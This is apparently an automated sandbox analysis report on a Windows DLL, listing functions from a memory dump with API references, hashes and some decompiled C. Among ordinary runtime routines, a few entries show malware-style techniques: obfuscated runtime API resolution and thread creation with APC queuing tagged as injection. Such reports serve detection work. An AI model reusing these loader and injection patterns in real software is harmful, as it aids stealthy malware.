    • Opcode Fuzzy Hash: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54DD2B, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: f764ab8b687f2b92141a1d159079149925baf696e3bb01017a8169fa8dc5afb0
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D550AC2, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 5c9ffcbf8b481c83dd0e44072fcee6dd8ff96caaf8a7244afcba3e61293e6962
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D537D45, Relevance: 9.2, APIs: 6, Instructions: 221COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: 8ee6b15ef3700e9755a9247527990c78733c35656359cd6d7b90620d7279b0e5
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: 8ee6b15ef3700e9755a9247527990c78733c35656359cd6d7b90620d7279b0e5
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535D7E, Relevance: 9.2, APIs: 6, Instructions: 180COMMON
    Download Yara Rule
    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 3211817929-0
    • Opcode ID: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction ID: 207e8859d230f5c46583432988c0e9f64fcb3a1dd6f5ca4dcf2b2a3037d2bf3d
    • Opcode Fuzzy Hash: ca1ef999371bdb1e7a840992bc85706dc6329adb1af593fcdb9564a47297e67b
    • Instruction Fuzzy Hash: F66191B19042299BDF0DCFA5D440BBEBBB8EF5A304F03545AE601A7A90FB749904CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535C28, Relevance: 9.1, APIs: 6, Instructions: 120COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5349E6, Relevance: 9.1, APIs: 6, Instructions: 95COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501AA5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D501AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D501C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d5041d0 + 0x6d505014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D50136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d5050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d505119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d5041d0 + 0x6d50512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D5018D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












    0x6d501ab3
    0x6d501ab7
    0x6d501b78
    0x6d501abd
    0x6d501ad5
    0x6d501ae4
    0x6d501aeb
    0x6d501aef
    0x6d501af2
    0x6d501b70
    0x6d501b71
    0x6d501af4
    0x6d501b01
    0x6d501b05
    0x6d501b08
    0x00000000
    0x6d501b0a
    0x6d501b17
    0x6d501b1b
    0x6d501b1e
    0x00000000
    0x6d501b20
    0x6d501b2d
    0x6d501b31
    0x6d501b34
    0x00000000
    0x6d501b36
    0x6d501b43
    0x6d501b47
    0x6d501b4a
    0x00000000
    0x6d501b4c
    0x6d501b52
    0x6d501b58
    0x6d501b5d
    0x6d501b64
    0x6d501b67
    0x00000000
    0x6d501b69
    0x6d501b6c
    0x6d501b6c
    0x6d501b67
    0x6d501b4a
    0x6d501b34
    0x6d501b1e
    0x6d501b08
    0x6d501af2
    0x6d501b86

    APIs
      • Part of subcall function 6D501C8F: HeapAlloc.KERNEL32(00000000,?,6D50117D,?,00000000,00000000,?,?,?,6D501810), ref: 6D501C9B
    • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D501272,?,?,?,?,00000002,00000000,?,?), ref: 6D501AC9
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501AEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B01
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B17
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B2D
    • GetProcAddress.KERNEL32(00000000,?), ref: 6D501B43
      • Part of subcall function 6D5018D1: memset.NTDLL ref: 6D501950
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$AllocHandleHeapModulememset
    • String ID:
    • API String ID: 426539879-0
    • Opcode ID: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction ID: 06c090254e768ffffda4703e05b9072da51824ba3b85085fdd979d50398ed559
    • Opcode Fuzzy Hash: 837c350207f7749dcbb6fadf70419ca32052ebbdd79332344cb6b32fa10a911d
    • Instruction Fuzzy Hash: 612141B150060A9FDB14EF69C980E6B77FCFF59288B018429F915C7A11E730E911CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501E04, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d504188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d50418c;
						if( *0x6d50418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d504198;
								if( *0x6d504198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d50418c);
						}
						HeapDestroy( *0x6d504190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d504188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0);
						_t41 = _t18;
						 *0x6d504190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d5041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D501CA4(E6D501D32, E6D501EE0(_a12, 1, 0x6d504198, _t41));
							 *0x6d50418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












    0x6d501e07
    0x6d501e13
    0x6d501e15
    0x6d501e18
    0x6d501e8e
    0x6d501e94
    0x6d501e96
    0x6d501e98
    0x6d501e9e
    0x6d501ea0
    0x6d501ea5
    0x6d501ea8
    0x6d501eb3
    0x6d501eb5
    0x00000000
    0x00000000
    0x6d501eb7
    0x6d501eba
    0x6d501ebc
    0x00000000
    0x00000000
    0x00000000
    0x6d501ebc
    0x6d501ec4
    0x6d501ec4
    0x6d501ed0
    0x6d501ed0
    0x6d501e1a
    0x6d501e1b
    0x6d501e3b
    0x6d501e41
    0x6d501e43
    0x6d501e48
    0x6d501e84
    0x6d501e84
    0x6d501e4a
    0x6d501e52
    0x6d501e59
    0x6d501e63
    0x6d501e6f
    0x6d501e76
    0x6d501e7b
    0x6d501e80
    0x00000000
    0x6d501e80
    0x6d501e7b
    0x6d501e48
    0x6d501e1b
    0x6d501edd

    APIs
    • InterlockedIncrement.KERNEL32(6D504188), ref: 6D501E26
    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6D501E3B
      • Part of subcall function 6D501CA4: CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
      • Part of subcall function 6D501CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
      • Part of subcall function 6D501CA4: GetLastError.KERNEL32(00000000), ref: 6D501CDB
      • Part of subcall function 6D501CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
      • Part of subcall function 6D501CA4: CloseHandle.KERNEL32(00000000), ref: 6D501CEC
      • Part of subcall function 6D501CA4: SetLastError.KERNEL32(00000000), ref: 6D501CF5
    • InterlockedDecrement.KERNEL32(6D504188), ref: 6D501E8E
    • SleepEx.KERNEL32(00000064,00000001), ref: 6D501EA8
    • CloseHandle.KERNEL32 ref: 6D501EC4
    • HeapDestroy.KERNEL32 ref: 6D501ED0
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
    • String ID:
    • API String ID: 2110400756-0
    • Opcode ID: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction ID: e47518073d8cf81db53b54104f1926deca42c706051f8a3e86ea37be545f352f
    • Opcode Fuzzy Hash: af81b4b42e9e7cef32f86eb63da37bff5263ff09e3b052b37ea79d7f3cfbc779
    • Instruction Fuzzy Hash: EF215171A01206EBDF049FA9CC84F6E7FB8FB6A3A9752452DE605D3940E7308D008B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EB4D, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,?,6D52E60D,6D52A335,6D52A779), ref: 6D52EBD4
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 118bb4508020c1f83d1e6cdc1314d97f7598335a7bfbdad2e9831edf32118299
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501CA4, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D501CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				long _t11;
				void* _t13;

				_t13 = CreateThread(0, 0, __imp__SleepEx,  *0x6d5041cc, 0, _a12);
				if(_t13 != 0 && QueueUserAPC(_v0, _t13, _a4) == 0) {
					_t11 = GetLastError();
					TerminateThread(_t13, _t11);
					CloseHandle(_t13);
					_t13 = 0;
					SetLastError(_t11);
				}
				return _t13;
			}






    0x6d501cc1
    0x6d501cc5
    0x6d501ce1
    0x6d501ce5
    0x6d501cec
    0x6d501cf3
    0x6d501cf5
    0x6d501cfb
    0x6d501cff

    APIs
    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6D504198,6D501E74), ref: 6D501CBB
    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6D501CD0
    • GetLastError.KERNEL32(00000000), ref: 6D501CDB
    • TerminateThread.KERNEL32(00000000,00000000), ref: 6D501CE5
    • CloseHandle.KERNEL32(00000000), ref: 6D501CEC
    • SetLastError.KERNEL32(00000000), ref: 6D501CF5
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
    • String ID:
    • API String ID: 3832013932-0
    • Opcode ID: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction ID: e8a26b5971025458e82b0f11c085cb150f8dde0193a0cb37bfc48d88cf124303
    • Opcode Fuzzy Hash: 0ab4a9fee8599366b2e6bd47becd1be40a0568556daaf98b7f1ae1b5ebd1ec7e
    • Instruction Fuzzy Hash: 0CF01C36606622BBEF125BA08C1CF5BBF79FB0A752F02880DFA0991950D72188119BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D529B8B, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 150COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,?,00000000,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(6D5694B8,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000,?,?), ref: 6D529C4C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$|@Wm
    • API String ID: 3880921956-4016660527
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D544CA5, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction ID: d06f77792ee8f0ddd8581fb2f5d9e3da557fbdd9d909316860f9029486c7d242
    • Opcode Fuzzy Hash: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction Fuzzy Hash: 11510371A44305AFDB19CF69C841B7A77F4FF88324F118969E919DBA60E770DA00CB82
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54D765, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction ID: 35cc19189a2f0fc8b008971ae3c199cd004566ee5b58b77260024d7b70d8c769
    • Opcode Fuzzy Hash: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction Fuzzy Hash: FBF0EC315046699BCB18DB58E4C9E3673E9AA86714762CC16F165D7D10CF20F9814A92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52F271, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
    Download Yara Rule
    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction ID: a149f0fe58e4c2dfae35c050c13240cf5a38d9f4efe91a3d641bacf0499868ba
    • Opcode Fuzzy Hash: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction Fuzzy Hash: 4541877190020AEFCF0ACFA5DC80AEEBBB6FF48344F158498FA05A7690D3359A54DB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52B60E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    • Opcode ID: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction ID: 65002f9509fbad7b982c144353000c565b5793898702aadffe886003448096e7
    • Opcode Fuzzy Hash: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction Fuzzy Hash: E51190311042069FD70CEF65C405BAAB7B8EF80319F164899D9618BAA1DB74FD44CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A170, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
    Download Yara Rule
    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,?,?,6D528974,?,6D571A64), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 182364050-3612616537
    • Opcode ID: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction ID: 821b17d38d87001d10ad88e0c54a7a50f43c3187920555c8d0b2ac57b33860c0
    • Opcode Fuzzy Hash: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction Fuzzy Hash: FE014B78D0810CBBCF08FBF4DC55CED777DAB50100F914420EB2092999EB74AA1D8AE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54BAA0, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction ID: 28a116ae2d610d7241b0095b3a87153722b14fbd7b8edaf7050acac51c309f4a
    • Opcode Fuzzy Hash: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction Fuzzy Hash: ADB158329082869FDB09DF68C8807FEBBF5EF95344F15C5AAD8409BA41D7348D02CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5329BB, Relevance: 6.2, APIs: 4, Instructions: 201COMMON
    Download Yara Rule
    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    • Opcode ID: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction ID: 587d2070596cf407629af46028d83733f3b256ece8c05a4906e21d4246238f51
